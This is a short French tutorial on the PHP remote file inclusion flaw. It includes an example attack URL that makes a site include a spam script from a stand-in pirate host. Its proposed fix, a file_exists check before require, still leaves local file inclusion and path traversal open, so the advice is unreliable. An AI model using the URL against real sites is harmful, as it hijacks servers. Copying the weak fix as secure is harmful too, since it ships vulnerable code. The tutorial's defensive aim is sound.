INCLUDE est une fonction sympathique en PHP qui permet d'intégrer un fichier dans un autre.
Je peux ainsi avoir une page index.php, qui contient le gabarit de mon site web, dans laquelle je fais un include d'une page passée en paramètre, ce qui donne comme lien:
index.php?page=accueil.htmlet dans ma page index.php j'aurai ce morceau de script:
include ("$page");Ce type de code est très pratique, mais surtout plus que dangereux.En effet on peut ainsi appeler une page externe avec un script permettant d'envoyer du Spam par exemple, cela en mettant dans la barre d'adresse du navigateur ce type de lien:
http://monsite.tld/index.php?page=http://sitedupirate.tld/monscriptdespam.phpAinsi un pirate utilisera le serveur sur lequel vous êtes hébergé pour envoyer du Spam (ou faire d'autres choses encore plus dangereuses) à partir de ses propres scripts hébergés n'importe ou.
Voici le moyen d'éviter ce type de piratage:
Il suffit de remplacer le code ci-dessus:
include ("$page");Par celui-ci:
if(file_exists($page))
{
require ("$page");
}
else
{
include 'mapageaccueil.html';
}Ce petit script qui fait aussi l'include de la page contenue dans la variable $page, teste avant l'include la présence locale du fichier que l'on demande d'afficher (if file_exists) et si le fichier n'existe pas comme dans l'exemple d'un pirate qui essayerait d'exécuter sa propre page, alors c'est une page d'accueil ou un page d'alerte qui est affichée.
Un moyen simple, mais efficace.
Lexi-Web est conseillé par Alpes Hosting